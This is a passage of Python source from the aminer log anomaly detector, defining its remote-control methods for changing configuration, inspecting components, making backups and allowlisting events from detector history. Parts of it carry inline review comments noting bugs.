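MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>.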
""" import aminer import resource import os import shutil from time import time from datetime import datetime import logging import re from aminer.input.InputInterfaces import AtomHandlerInterface from aminer.util import PersistenceUtil from aminer import AnalysisChild, AminerConfig from aminer.AminerConfig import KEY_PERSISTENCE_PERIOD, KEY_LOG_STAT_LEVEL, KEY_LOG_DEBUG_LEVEL, KEY_LOG_STAT_PERIOD, \ KEY_RESOURCES_MAX_MEMORY_USAGE, KEY_LOG_PREFIX, KEY_PERSISTENCE_DIR, DEFAULT_PERSISTENCE_DIR, KEY_LOG_SOURCES_LIST, DEBUG_LOG_NAME attr_str = '"%s": %s,\n' component_not_found = 'Event history component not found.' class AminerRemoteControlExecutionMethods: """This class defines all possible methods for the remote control.""" REMOTE_CONTROL_RESPONSE = '' ERROR_MESSAGE_RESOURCE_NOT_FOUND = '"Resource \\"%s\\" could not be found."' CONFIG_KEY_MAIL_TARGET_ADDRESS = 'MailAlerting.TargetAddress' CONFIG_KEY_MAIL_FROM_ADDRESS = 'MailAlerting.FromAddress' CONFIG_KEY_MAIL_SUBJECT_PREFIX = 'MailAlerting.SubjectPrefix' CONFIG_KEY_MAIL_ALERT_GRACE_TIME = 'MailAlerting.AlertGraceTime' CONFIG_KEY_EVENT_COLLECT_TIME = 'MailAlerting.EventCollectTime' CONFIG_KEY_ALERT_MIN_GAP = 'MailAlerting.MinAlertGap' CONFIG_KEY_ALERT_MAX_GAP = 'MailAlerting.MaxAlertGap' CONFIG_KEY_ALERT_MAX_EVENTS_PER_MESSAGE = 'MailAlerting.MaxEventsPerMessage' MAIL_CONFIG_PROPERTIES = [CONFIG_KEY_MAIL_TARGET_ADDRESS, CONFIG_KEY_MAIL_FROM_ADDRESS] INTEGER_CONFIG_PROPERTY_LIST = [ CONFIG_KEY_MAIL_ALERT_GRACE_TIME, CONFIG_KEY_EVENT_COLLECT_TIME, CONFIG_KEY_ALERT_MIN_GAP, CONFIG_KEY_ALERT_MAX_GAP, CONFIG_KEY_ALERT_MAX_EVENTS_PER_MESSAGE, KEY_PERSISTENCE_PERIOD, KEY_LOG_STAT_LEVEL, KEY_LOG_DEBUG_LEVEL, KEY_LOG_STAT_PERIOD, KEY_RESOURCES_MAX_MEMORY_USAGE ] STRING_CONFIG_PROPERTY_LIST = [ CONFIG_KEY_MAIL_TARGET_ADDRESS, CONFIG_KEY_MAIL_FROM_ADDRESS, CONFIG_KEY_MAIL_SUBJECT_PREFIX, KEY_LOG_PREFIX ] def print_response(self, value): """Add a value to the response string.""" self.REMOTE_CONTROL_RESPONSE += str(value) def 
change_config_property(self, analysis_context, property_name, value): """Change a config_property in an running aminer instance.""" result = 0 config_keys_mail_alerting = [ self.CONFIG_KEY_MAIL_TARGET_ADDRESS, self.CONFIG_KEY_MAIL_FROM_ADDRESS, self.CONFIG_KEY_MAIL_SUBJECT_PREFIX, self.CONFIG_KEY_EVENT_COLLECT_TIME, self.CONFIG_KEY_ALERT_MIN_GAP, self.CONFIG_KEY_ALERT_MAX_GAP, self.CONFIG_KEY_ALERT_MAX_EVENTS_PER_MESSAGE, self.CONFIG_KEY_MAIL_ALERT_GRACE_TIME] if not isinstance(analysis_context, AnalysisChild.AnalysisContext): self.REMOTE_CONTROL_RESPONSE += f"FAILURE: the analysis_context must be of type {AnalysisChild.AnalysisContext.__class__}." return if property_name not in self.INTEGER_CONFIG_PROPERTY_LIST + self.STRING_CONFIG_PROPERTY_LIST: self.REMOTE_CONTROL_RESPONSE += f"FAILURE: the property '{property_name}' does not exist in the current config!" return if property_name in self.INTEGER_CONFIG_PROPERTY_LIST: t = int else: t = str if not isinstance(value, t): self.REMOTE_CONTROL_RESPONSE += f"FAILURE: the value of the property '{property_name}' must be of type {t}!" return if property_name in [KEY_PERSISTENCE_DIR, KEY_LOG_SOURCES_LIST]: self.REMOTE_CONTROL_RESPONSE += f"FAILURE: the property '{property_name}' can only be changed at startup in the aminer root" \ f" process!" 
return if property_name == KEY_RESOURCES_MAX_MEMORY_USAGE: result = self.change_config_property_max_memory(analysis_context, value) elif property_name in config_keys_mail_alerting: result = self.change_config_property_mail_alerting(analysis_context, property_name, value) elif property_name in (KEY_LOG_PREFIX, KEY_PERSISTENCE_PERIOD, KEY_LOG_STAT_PERIOD): analysis_context.aminer_config.config_properties[property_name] = value result = 0 elif property_name == KEY_LOG_STAT_LEVEL: result = self.change_config_property_log_stat_level(analysis_context, value) elif property_name == KEY_LOG_DEBUG_LEVEL: result = self.change_config_property_log_debug_level(analysis_context, value) else: self.REMOTE_CONTROL_RESPONSE += f"FAILURE: property {property_name} could not be changed. Please check the property_name again." return if result == 0: msg = f"'{property_name}' changed to '{value}' successfully." self.REMOTE_CONTROL_RESPONSE += msg logging.getLogger(DEBUG_LOG_NAME).info(msg) def change_config_property_mail_alerting(self, analysis_context, property_name, value): """Change any mail property.""" is_email = re.compile(r"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)|^[a-zA-Z0-9]+@localhost$") if property_name in self.MAIL_CONFIG_PROPERTIES and not is_email.match(value): self.REMOTE_CONTROL_RESPONSE += "FAILURE: MailAlerting.TargetAddress and MailAlerting.FromAddress must be email addresses!" 
return 1 analysis_context.aminer_config.config_properties[property_name] = value for analysis_component_id in analysis_context.get_registered_component_ids(): component = analysis_context.get_component_by_id(analysis_component_id) if component.__class__.__name__ == "DefaultMailNotificationEventHandler": setattr(component, property_name, value) return 0 def change_config_property_max_memory(self, analysis_context, max_memory_mb): """Change the maximal allowed RAM usage of the aminer instance.""" try: max_memory_mb = int(max_memory_mb) if max_memory_mb < 32 and max_memory_mb != -1: self.REMOTE_CONTROL_RESPONSE += "FAILURE: it is not safe to run the aminer with less than 32MB RAM." return 1 resource.setrlimit(resource.RLIMIT_AS, (max_memory_mb * 1024 * 1024, resource.RLIM_INFINITY)) analysis_context.aminer_config.config_properties[KEY_RESOURCES_MAX_MEMORY_USAGE] = max_memory_mb return 0 except ValueError: self.REMOTE_CONTROL_RESPONSE += "FAILURE: property 'maxMemoryUsage' must be of type Integer!" return 1 def change_config_property_log_stat_level(self, analysis_context, stat_level): """Set the statistic logging level.""" if stat_level in (0, 1, 2): analysis_context.aminer_config.config_properties[KEY_LOG_STAT_LEVEL] = stat_level AminerConfig.STAT_LEVEL = stat_level return 0 self.REMOTE_CONTROL_RESPONSE += f"FAILURE: STAT_LEVEL {stat_level} is not allowed. Allowed STAT_LEVEL values are 0, 1, 2." return 1 def change_config_property_log_debug_level(self, analysis_context, debug_level): """Set the debug log level.""" if debug_level in (0, 1, 2): analysis_context.aminer_config.config_properties[KEY_LOG_DEBUG_LEVEL] = debug_level AminerConfig.DEBUG_LEVEL = debug_level debug_logger = logging.getLogger(DEBUG_LOG_NAME) if debug_level == 0: debug_logger.setLevel(logging.ERROR) elif debug_level == 1: debug_logger.setLevel(logging.INFO) else: debug_logger.setLevel(logging.DEBUG) return 0 self.REMOTE_CONTROL_RESPONSE += f"FAILURE: DEBUG_LEVEL {debug_level} is not allowed. 
Allowed DEBUG_LEVEL values are 0, 1, 2." return 1 def change_attribute_of_registered_analysis_component(self, analysis_context, component_name, attribute, value): """Change a specific attribute of a registered component. @param analysis_context the analysis context of the aminer. @param component_name the name to be registered in the analysis_context. @param attribute the name of the attribute to be printed. @param value the new value of the attribute. """ attr = getattr(analysis_context.get_component_by_name(component_name), attribute) if type(attr) is type(value): setattr(analysis_context.get_component_by_name(component_name), attribute, value) msg = f"'{component_name}.{attribute}' changed from {repr(attr)} to {value} successfully." self.REMOTE_CONTROL_RESPONSE += msg logging.getLogger(DEBUG_LOG_NAME).info(msg) else: self.REMOTE_CONTROL_RESPONSE += f"FAILURE: property '{component_name}.{attribute}' must be of type {type(attr)}!" def rename_registered_analysis_component(self, analysis_context, old_component_name, new_component_name): """Rename an analysis component by removing and readding it to the analysis_context. @param analysis_context the analysis context of the aminer. @param old_component_name the current name of the component. @param new_component_name the new name of the component. """ if type(old_component_name) is not str or type(new_component_name) is not str: self.REMOTE_CONTROL_RESPONSE = "FAILURE: the parameters 'old_component_name' and 'new_component_name' must be of type str." else: component = analysis_context.get_component_by_name(old_component_name) if component is None: self.REMOTE_CONTROL_RESPONSE += f"FAILURE: the component '{old_component_name}' does not exist." else: analysis_context.registered_components_by_name[old_component_name] = None analysis_context.registered_components_by_name[new_component_name] = component msg = f"Component '{old_component_name}' renamed to '{new_component_name}' successfully." 
self.REMOTE_CONTROL_RESPONSE += msg logging.getLogger(DEBUG_LOG_NAME).info(msg) def print_config_property(self, analysis_context, property_name): """Print a specific config property. @param analysis_context the analysis context of the aminer. @param property_name the name of the property to be printed. """ if property_name not in analysis_context.aminer_config.config_properties: self.REMOTE_CONTROL_RESPONSE = self.ERROR_MESSAGE_RESOURCE_NOT_FOUND % property_name return val = analysis_context.aminer_config.config_properties[property_name] if isinstance(val, list): val = str(val).replace('"False"', 'false').replace('"True"', 'true').replace('"None"', 'null').strip(' ').replace("'", '"') else: val = str(val).replace('"False"', 'false').replace('"True"', 'true').replace('"None"', 'null').strip(' ') if val.isdigit(): val = int(val) elif '.' in val: try: val = float(val) except ValueError: pass self.REMOTE_CONTROL_RESPONSE = f'"{property_name}": {val}' def print_attribute_of_registered_analysis_component(self, analysis_context, component_name, attribute): """Print a specific attribute of a registered component. @param analysis_context the analysis context of the aminer. @param component_name the name to be registered in the analysis_context. @param attribute the name of the attribute to be printed. """ if type(component_name) is not str or type(attribute) is not str: self.REMOTE_CONTROL_RESPONSE += "FAILURE: the parameters 'component_name' and 'attribute' must be of type str." return if analysis_context.get_component_by_name(component_name) is None: self.REMOTE_CONTROL_RESPONSE += f"FAILURE: the component '{component_name}' does not exist." 
return if hasattr(analysis_context.get_component_by_name(component_name), attribute): attr = getattr(analysis_context.get_component_by_name(component_name), attribute, None) if isinstance(attr, set): attr = list(attr) if hasattr(attr, '__dict__') and self.isinstance_aminer_class(attr): new_attr = self.get_all_vars(attr, ' ') if isinstance(new_attr, str): new_attr = f'"{new_attr}"' self.REMOTE_CONTROL_RESPONSE += f'"{component_name}.{attribute}": {new_attr}' elif isinstance(attr, list): self.REMOTE_CONTROL_RESPONSE += f'"{component_name}.{attribute}": [' for at in attr: if hasattr(at, '__dict__') and self.isinstance_aminer_class(at): new_attr = "\n[\n " + at.__class__.__name__ + " {\n" + self.get_all_vars(at, ' ') + " }\n]" else: if isinstance(at, str): new_attr = f'"{at}"' else: new_attr = str(at) self.REMOTE_CONTROL_RESPONSE += f"{new_attr}, " self.REMOTE_CONTROL_RESPONSE = self.REMOTE_CONTROL_RESPONSE.rstrip(", ") self.REMOTE_CONTROL_RESPONSE += "]" else: if attr is None or isinstance(attr, (str, bool)): attr = f'"{attr}"' self.REMOTE_CONTROL_RESPONSE += f'"{component_name}.{attribute}": {attr}' self.REMOTE_CONTROL_RESPONSE = self.REMOTE_CONTROL_RESPONSE.replace('"False"', 'false').replace('"True"', 'true').replace( '"None"', 'null') else: self.REMOTE_CONTROL_RESPONSE += f"FAILURE: the component '{component_name}' does not have an attribute named '{attribute}'." def print_current_config(self, analysis_context): """Print the entire aminer config. @param analysis_context the analysis context of the aminer. 
""" for config_property in analysis_context.aminer_config.config_properties: if isinstance(analysis_context.aminer_config.config_properties[config_property], str): self.REMOTE_CONTROL_RESPONSE += f'"{config_property}": ' \ f'"{analysis_context.aminer_config.config_properties[config_property]}",\n' else: self.REMOTE_CONTROL_RESPONSE += attr_str % ( config_property, analysis_context.aminer_config.config_properties[config_property]) for component_id in analysis_context.get_registered_component_ids(): self.REMOTE_CONTROL_RESPONSE += \ f'"{analysis_context.get_name_by_component(analysis_context.get_component_by_id(component_id))}": ' + '{\n' component = analysis_context.get_component_by_id(component_id) self.REMOTE_CONTROL_RESPONSE += self.get_all_vars(component, ' ') self.REMOTE_CONTROL_RESPONSE += "},\n\n" self.REMOTE_CONTROL_RESPONSE = self.REMOTE_CONTROL_RESPONSE.replace("'", '"').replace('"False"', 'false').replace( '"True"', 'true').replace('"None"', 'null').replace('\\"', "'").rstrip(',\n\n\n') + '\n\n' def get_all_vars(self, obj, indent): """Return all variables in string representation.""" result = '' for var in vars(obj): attr = getattr(obj, var, None) if attr is not None and isinstance(attr, (tuple, set)): attr = list(attr) if attr is not None and hasattr(attr, '__dict__') and self.isinstance_aminer_class(attr): result += indent + '"%s": {\n' % var + self.get_all_vars(attr, indent + ' ') + indent + "},\n" elif isinstance(attr, list): for at in attr: if hasattr(at, '__dict__') and self.isinstance_aminer_class(at): result += indent + '"%s": {\n' % var + indent + ' "' + at.__class__.__name__ + \ '": {\n' + self.get_all_vars(at, indent + ' ') + indent + ' ' + "}\n" + indent + '},\n' else: rep = _reformat_attr(attr) result += indent + attr_str % (var, rep) break else: rep = _reformat_attr(attr) result += indent + attr_str % (var, rep) return result.rstrip(',\n') + '\n' @staticmethod def isinstance_aminer_class(obj): """Test if an object is of an instance of a 
aminer class.""" class_list = [ aminer.analysis.AtomFilters.SubhandlerFilter, aminer.analysis.AtomFilters.MatchPathFilter, aminer.analysis.AtomFilters.MatchValueFilter, aminer.analysis.HistogramAnalysis.LinearNumericBinDefinition, aminer.analysis.HistogramAnalysis.BinDefinition, aminer.analysis.HistogramAnalysis.ModuloTimeBinDefinition, aminer.analysis.Rules.MatchAction, aminer.analysis.Rules.MatchRule, aminer.analysis.HistogramAnalysis.HistogramData, aminer.analysis.TimeCorrelationViolationDetector.CorrelationRule, aminer.analysis.TimeCorrelationDetector.CorrelationFeature, aminer.events.EventInterfaces.EventHandlerInterface, aminer.util.History.ObjectHistory] for c in class_list: if isinstance(obj, c): return True return False def save_current_config(self, analysis_context, destination_file): """Save the current live config into a file. @param analysis_context the analysis context of the aminer. @param destination_file the path to the file in which the config is saved. """ if re.match("^(/[^/ ]*)+/?$", destination_file) is not None: msg = AminerConfig.save_config(analysis_context, destination_file) else: msg = f"Exception: {destination_file} is not a valid filename!" 
self.REMOTE_CONTROL_RESPONSE = msg logging.getLogger(DEBUG_LOG_NAME).info(msg) def persist_all(self): """Persist all data by calling the function in PersistenceUtil.""" PersistenceUtil.persist_all() self.REMOTE_CONTROL_RESPONSE = 'OK' logging.getLogger(DEBUG_LOG_NAME).info('Called persist_all() via remote control.') def create_backup(self, analysis_context): """Create a backup with the current datetime string.""" backup_time = time() backup_time_str = datetime.fromtimestamp(backup_time).strftime('%Y-%m-%d-%H-%M-%S') persistence_dir = analysis_context.aminer_config.config_properties[KEY_PERSISTENCE_DIR] persistence_dir = persistence_dir.rstrip('/') backup_path = persistence_dir + '/backup/' backup_path_with_date = os.path.join(backup_path, backup_time_str) shutil.copytree(persistence_dir, backup_path_with_date, ignore=shutil.ignore_patterns('backup*')) msg = f"Created backup {backup_time_str}" self.REMOTE_CONTROL_RESPONSE = f"Created backup {backup_time_str}" logging.getLogger(DEBUG_LOG_NAME).info(msg) def list_backups(self, analysis_context): """List all available backups from the persistence directory.""" persistence_dir = analysis_context.aminer_config.config_properties.get(KEY_PERSISTENCE_DIR, DEFAULT_PERSISTENCE_DIR) for _dirpath, dirnames, _filenames in os.walk(os.path.join(persistence_dir, 'backup')): self.REMOTE_CONTROL_RESPONSE = f'"backups": {dirnames}' break self.REMOTE_CONTROL_RESPONSE = self.REMOTE_CONTROL_RESPONSE.replace("'", '"') def allowlist_event_in_component(self, analysis_context, component_name, event_data, allowlisting_data=None): """Allowlists one or multiple specific events from the history in the component it occurred in. @param analysis_context the analysis context of the aminer. @param component_name the name to be registered in the analysis_context. @param event_data the event_data for the allowlist_event method. @param allowlisting_data this data is passed on into the allowlist_event method. 
""" component = analysis_context.get_component_by_name(component_name) if component is None: self.REMOTE_CONTROL_RESPONSE += f"FAILURE: component '{component}' does not exist!" return if component.__class__.__name__ not in [ "EnhancedNewMatchPathValueComboDetector", "MissingMatchPathValueDetector", "NewMatchPathDetector", "NewMatchPathValueComboDetector", "NewMatchIdValueComboDetector", "EventCorrelationDetector", "NewMatchPathValueDetector"]: self.REMOTE_CONTROL_RESPONSE += \ f"FAILURE: component class '{component.__class__.__name__}' does not support allowlisting! Only the following classes " \ f"support allowlisting: EnhancedNewMatchPathValueComboDetector, MissingMatchPathValueDetector, NewMatchPathDetector," \ f" NewMatchIdValueComboDetector, NewMatchPathValueComboDetector, NewMatchPathValueDetector and EventCorrelationDetector." return try: msg = component.allowlist_event(f"Analysis.{component.__class__.__name__}", event_data, allowlisting_data) self.REMOTE_CONTROL_RESPONSE += msg logging.getLogger(DEBUG_LOG_NAME).info(msg) except Exception as e: self.REMOTE_CONTROL_RESPONSE += "Exception: " + repr(e) def blocklist_event_in_component(self, analysis_context, component_name, event_data, blocklisting_data=None): """Blocklists one or multiple specific events from the history in the component it occurred in. @param analysis_context the analysis context of the aminer. @param component_name the name to be registered in the analysis_context. @param event_data the event_data for the allowlist_event method. @param blocklisting_data this data is passed on into the blocklist_event method. """ component = analysis_context.get_component_by_name(component_name) if component is None: self.REMOTE_CONTROL_RESPONSE += f"FAILURE: component '{component}' does not exist!" return if not hasattr(component, "blocklist_event"): self.REMOTE_CONTROL_RESPONSE += f"FAILURE: component class '{component.__class__.__name__}' does not support blocklisting!" 
return try: msg = component.blocklist_event(f"Analysis.{component.__class__.__name__}", event_data, blocklisting_data) self.REMOTE_CONTROL_RESPONSE += msg logging.getLogger(DEBUG_LOG_NAME).info(msg) except Exception as e: self.REMOTE_CONTROL_RESPONSE += "Exception: " + repr(e) def print_persistence_event_in_component(self, analysis_context, component_name, event_data): """Prints the persistence specified in event_data of component_name. @param analysis_context the analysis context of the aminer. @param component_name the name to be registered in the analysis_context. @param event_data the event_data for the print_persistence_event method. """ component = analysis_context.get_component_by_name(component_name) if component is None: self.REMOTE_CONTROL_RESPONSE += f"FAILURE: component '{component}' does not exist!" return if not hasattr(component, "print_persistence_event"): self.REMOTE_CONTROL_RESPONSE += \ f"FAILURE: component class '{component.__class__.__name__}' does not support the print_persistence_event!" return try: msg = component.print_persistence_event(f"Analysis.{component.__class__.__name__}", event_data) self.REMOTE_CONTROL_RESPONSE += msg logging.getLogger(DEBUG_LOG_NAME).info(msg) except Exception as e: self.REMOTE_CONTROL_RESPONSE += "Exception: " + repr(e) def add_to_persistence_event_in_component(self, analysis_context, component_name, event_data): """Add information specified in event_data to the persistence of component_name. @param analysis_context the analysis context of the aminer. @param component_name the name to be registered in the analysis_context. @param event_data the event_data for the add_to_persistence_event method. """ component = analysis_context.get_component_by_name(component_name) if component is None: self.REMOTE_CONTROL_RESPONSE += f"FAILURE: component '{component}' does not exist!" 
return if not hasattr(component, "add_to_persistence_event"): self.REMOTE_CONTROL_RESPONSE += \ f"FAILURE: component class '{component.__class__.__name__}' does not support the add_to_persistence_event!" return try: msg = component.add_to_persistence_event(f"Analysis.{component.__class__.__name__}", event_data) self.REMOTE_CONTROL_RESPONSE += msg logging.getLogger(DEBUG_LOG_NAME).info(msg) except Exception as e: self.REMOTE_CONTROL_RESPONSE += "Exception: " + repr(e) def remove_from_persistence_event_in_component(self, analysis_context, component_name, event_data): """Remove information specified in event_data from the persistence of component_name. @param analysis_context the analysis context of the aminer. @param component_name the name to be registered in the analysis_context. @param event_data the event_data for the remove_from_persistence_event method. """ component = analysis_context.get_component_by_name(component_name) if component is None: self.REMOTE_CONTROL_RESPONSE += f"FAILURE: component '{component}' does not exist!" return if not hasattr(component, "remove_from_persistence_event"): self.REMOTE_CONTROL_RESPONSE += \ f"FAILURE: component class '{component.__class__.__name__}' does not support the remove_from_persistence_event!" return try: msg = component.remove_from_persistence_event(f"Analysis.{component.__class__.__name__}", event_data) self.REMOTE_CONTROL_RESPONSE += msg logging.getLogger(DEBUG_LOG_NAME).info(msg) except Exception as e: self.REMOTE_CONTROL_RESPONSE += "Exception: " + repr(e) def add_handler_to_atom_filter_and_register_analysis_component(self, analysis_context, atom_handler, component, component_name): """Add a new component to the analysis_context. @param analysis_context the analysis context of the aminer. @param atom_handler the registered name of the atom_handler component to add the new component to. @param component the component to be added. @param component_name the name to be registered in the analysis_context. 
""" atom_filter = analysis_context.get_component_by_name(atom_handler) if atom_filter is None: self.REMOTE_CONTROL_RESPONSE += f"FAILURE: atom_handler '{atom_handler}' does not exist!" return if analysis_context.get_component_by_name(component_name) is not None: self.REMOTE_CONTROL_RESPONSE += f"FAILURE: component with same name already registered! ({component_name})" return if not isinstance(component, AtomHandlerInterface): self.REMOTE_CONTROL_RESPONSE += "FAILURE: 'component' must implement the AtomHandlerInterface!" return atom_filter.add_handler(component) analysis_context.register_component(component, component_name) msg = f"Component '{component_name}' added to '{atom_handler}' successfully." self.REMOTE_CONTROL_RESPONSE += msg logging.getLogger(DEBUG_LOG_NAME).info(msg) def dump_events_from_history(self, analysis_context, history_component_name, dump_event_id): """Detailed print of a specific event from the history. @param analysis_context the analysis context of the aminer. @param history_component_name the registered name of the history component. @param dump_event_id a numeric id of the events to be printed. 
""" self.REMOTE_CONTROL_RESPONSE = None history_handler = analysis_context.get_component_by_name(history_component_name) if history_handler is None: self.REMOTE_CONTROL_RESPONSE = component_not_found else: history_data = history_handler.get_history() result_string = 'FAIL: not found' for event_pos in enumerate(history_data): event_id, event_type, event_message, sorted_log_lines, event_data, _event_source = history_data[event_pos] if event_id != dump_event_id: continue append_log_lines_flag = True result_string = f"OK\nEvent {event_id}: {event_message} ({event_type})" if event_type == 'Analysis.NewMatchPathDetector': result_string += f"\n Logline: {sorted_log_lines[0]}" elif event_type == 'Analysis.NewMatchPathValueComboDetector': result_string += '\nParser match:\n' + event_data[0].parser_match.matchElement.annotate_match(' ') elif event_type == 'Analysis.AllowlistViolationDetector': result_string += '\nParser match:\n' + event_data.parser_match.matchElement.annotate_match(' ') elif event_type == 'ParserModel.UnparsedData': result_string += f"\n Unparsed line: {sorted_log_lines[0]}" append_log_lines_flag = False else: result_string += f"\n Data: {str(event_data)}" if append_log_lines_flag and (sorted_log_lines is not None) and (len(sorted_log_lines) != 0): result_string += '\n Log lines:\n %s' % '\n '.join(sorted_log_lines) break self.REMOTE_CONTROL_RESPONSE = result_string logging.getLogger(DEBUG_LOG_NAME).info(result_string) def ignore_events_from_history(self, analysis_context, history_component_name, event_ids): """Ignore one or multiple specific events from the history. These ignores do not affect the components itself. @param analysis_context the analysis context of the aminer. @param history_component_name the registered name of the history component. @param event_ids a list of numeric ids of the events to be ignored. 
""" history_handler = analysis_context.get_component_by_name(history_component_name) if history_handler is None: self.REMOTE_CONTROL_RESPONSE = component_not_found return history_data = history_handler.get_history() id_spec_list = [] for element in event_ids: if isinstance(element, list): id_spec_list.append(element) delete_count = 0 event_pos = 0 while event_pos < len(history_data): event_id, _event_type, _event_message, _sorted_log_lines, _event_data, _event_source = history_data[event_pos] may_delete_flag = False if event_id in event_ids: may_delete_flag = True else: for id_range in id_spec_list: if id_range[0] <= event_id <= id_range[1]: may_delete_flag = True if may_delete_flag: history_data[:] = history_data[:event_pos] + history_data[event_pos + 1:] delete_count += 1 else: event_pos += 1 msg = f"OK\n{delete_count} elements ignored" self.REMOTE_CONTROL_RESPONSE = msg logging.getLogger(DEBUG_LOG_NAME).info(msg) def list_events_from_history(self, analysis_context, history_component_name, max_event_count=None): """List the latest events of a specific history component. @param analysis_context the analysis context of the aminer. @param history_component_name the registered name of the history component. @param max_event_count the number of the newest events to be listed. 
""" history_handler = analysis_context.get_component_by_name(history_component_name) if history_handler is None: self.REMOTE_CONTROL_RESPONSE = component_not_found else: history_data = history_handler.get_history() max_events = len(history_data) if max_event_count is None or max_events < max_event_count: max_event_count = max_events result_string = 'OK' for event_id, _event_type, event_message, sorted_log_lines, _event_data, _event_source in history_data[:max_event_count]: result_string += f"\nEvent {event_id}: {event_message}; Log data: {repr(sorted_log_lines)}"[:240] self.REMOTE_CONTROL_RESPONSE = result_string def allowlist_events_from_history(self, analysis_context, history_component_name, id_spec_list, allowlisting_data=None): """Allowlists one or multiple specific events from the history in the component it occurred in. @param analysis_context the analysis context of the aminer. @param history_component_name the registered name of the history component. @param id_spec_list a list of numeric ids of the events to be allowlisted. @param allowlisting_data this data is passed on into the allowlist_event method. """ from aminer.events.EventInterfaces import EventSourceInterface history_handler = analysis_context.get_component_by_name(history_component_name) if history_handler is None: self.REMOTE_CONTROL_RESPONSE = component_not_found return if id_spec_list is None or not isinstance(id_spec_list, list): self.REMOTE_CONTROL_RESPONSE = \ 'Request requires remote_control_data with ID specification list and optional allowlisting information.' 
return
# --- tail of AminerRemoteControlExecutionMethods.allowlist_events_from_history (its header lies before this span) ---
# From here on id_spec_list is known to be a list. Its entries arrive via remote_control_data, i.e. from the remote-control
# peer, and are matched against the history either as plain ids or as two-element [low, high] ranges.
history_data = history_handler.get_history()
result_string = ''
lookup_count = 0
event_pos = 0
while event_pos < len(history_data):
    event_id, event_type, _event_message, sorted_log_lines, event_data, event_source = history_data[event_pos]
    found_flag = False
    if event_id in id_spec_list:
        found_flag = True
    else:
        for id_range in id_spec_list:
            # NOTE(review): a range entry shorter than two elements raises IndexError here, which propagates out of this
            # method instead of producing a FAIL line; guarding with `len(id_range) == 2` keeps the response well-formed.
            if isinstance(id_range, list) and (id_range[0] <= event_id <= id_range[1]):
                found_flag = True
    if not found_flag:
        event_pos += 1
        continue
    lookup_count += 1
    allowlisted_flag = False
    if isinstance(event_source, EventSourceInterface):
        # This should be the default for all detectors.
        try:
            # allowlisting_data is forwarded unchanged from the remote request; any validation is left to the detector.
            message = event_source.allowlist_event(
                event_type, sorted_log_lines, event_data, allowlisting_data)
            result_string += f"OK {event_id}: {message}\n"
            # Logs the whole response accumulated so far, so earlier lines are repeated in the log on every success.
            logging.getLogger(DEBUG_LOG_NAME).info(result_string)
            allowlisted_flag = True
        except NotImplementedError:
            # NOTE(review): the only status line without a trailing "\n", so the following OK/FAIL line is glued onto it.
            result_string += f"FAIL {event_id}: component does not support allowlisting."
        except Exception as wl_exception:
            result_string += f"FAIL {event_id}: {str(wl_exception)}\n"
    elif event_type == 'Analysis.AllowlistViolationDetector':
        # Reported as FAIL but still dropped from the history below; allowlisted_flag is set on purpose.
        result_string += f"FAIL {event_id}: No automatic modification of allowlist rules, manual changes required\n"
        allowlisted_flag = True
    elif event_type == 'ParserModel.UnparsedData':
        result_string += f"FAIL {event_id}: No automatic modification of parsers yet\n"
    else:
        result_string += f"FAIL {event_id}: Unsupported event type {event_type}\n"
    if allowlisted_flag:
        # Clear the allowlisted event. Slice assignment edits the list in place, which only reaches the history component
        # if get_history() hands out its live list rather than a copy — presumably it does; confirm.
        history_data[:] = history_data[:event_pos] + history_data[event_pos + 1:]
    else:
        event_pos += 1
if lookup_count == 0:
    result_string = 'FAIL: Not a single event ID from specification found'
self.REMOTE_CONTROL_RESPONSE = result_string

    def reopen_event_handler_streams(self, analysis_context):
        """Reopen all StreamPrinterEventHandler streams for log rotation.
        Delegates to AnalysisContext.close_event_handler_streams(..., reopen=True) for every handler in the atomizer factory's
        event_handler_list. That method terminates the process with sys.exit(1) when a stream cannot be closed or reopened, so
        an unwritable output path turns this remote-control command into a shutdown of the analysis child.
        @param analysis_context the analysis context of the aminer.
        """
        analysis_context.close_event_handler_streams(analysis_context.atomizer_factory.event_handler_list, reopen=True)
        msg = "Reopened all StreamPrinterEventHandler streams."
        self.REMOTE_CONTROL_RESPONSE = msg
        logging.getLogger(DEBUG_LOG_NAME).info(msg)


def _repr_recursive(attr):
    """Return a valid JSON representation of an config attribute with the types list, dict, set or tuple.
    Scalars are passed through unchanged (int/str/float), bytes are decoded, bools and values of type(AminerConfig) are
    stringified and anything else is replaced by its class name. Containers are rendered with str() and then patched into
    JSON syntax by string replacement.
    @param attr the attribute to be represented.
    @return None for None, an unquoted int/float/str scalar, or a str holding the JSON text of a container.
    """
    if attr is None:
        return None
    if isinstance(attr, (bool, type(AminerConfig))):
        rep = str(attr)
    elif isinstance(attr, (int, str, float)):
        rep = attr
    elif isinstance(attr, bytes):
        rep = attr.decode()
    elif isinstance(attr, (list, tuple, set)):
        if isinstance(attr, (tuple, set)):
            attr = list(attr)
        # A list argument is rewritten in place: the caller's configuration list ends up holding the representations
        # instead of its original elements. Tuples and sets were copied above and are unaffected.
        for i, a in enumerate(attr):
            attr[i] = _repr_recursive(a)
        # NOTE(review): producing JSON by patching str(list) is fragile — an element containing quotes or brackets corrupts
        # the output. json.dumps() is the robust replacement if this module can import json.
        rep = str(attr).replace('\\"', "'").replace("'[", "[").replace("]'", "]").replace("'", '"').replace('"False"', 'false').replace(
            '"True"', 'true').replace('"None"', 'null')
    elif isinstance(attr, dict):
        new_attr = {}
        # NOTE(review): this branch represents each *key* and stores it under str(key); attr[key] is never read, so the
        # dictionary's values are dropped. If values are meant to appear the line should read
        # `value = _repr_recursive(attr[key])` — confirm the intended output against the callers.
        for key in attr.keys():
            value = _repr_recursive(key)
            if isinstance(value, str):
                value = value.replace('\\"', "'")
            new_attr[str(key)] = value
        rep = str(new_attr).replace("'[", "[").replace("]'", "]")
    else:
        rep = attr.__class__.__name__
    return rep


def _reformat_attr(attr):
    """Return a valid JSON representation of an config attribute with any type.
    If the type is list, dict, set or tuple _repr_recursive is called.
    Scalars are rendered with str(), bytes are decoded and other objects become their class name. The quoting passes then
    normalise single quotes to double quotes and finally quote any non-container value that is neither already quoted nor numeric.
    @param attr the attribute to be represented.
    @return a str with the JSON text.
    """
    if type(attr) in (int, str, float, bool, type(AminerConfig), type(None)):
        rep = str(attr)
    elif isinstance(attr, bytes):
        rep = attr.decode()
    elif isinstance(attr, (list, dict, set, tuple)):
        rep = _repr_recursive(attr)
    else:
        rep = attr.__class__.__name__
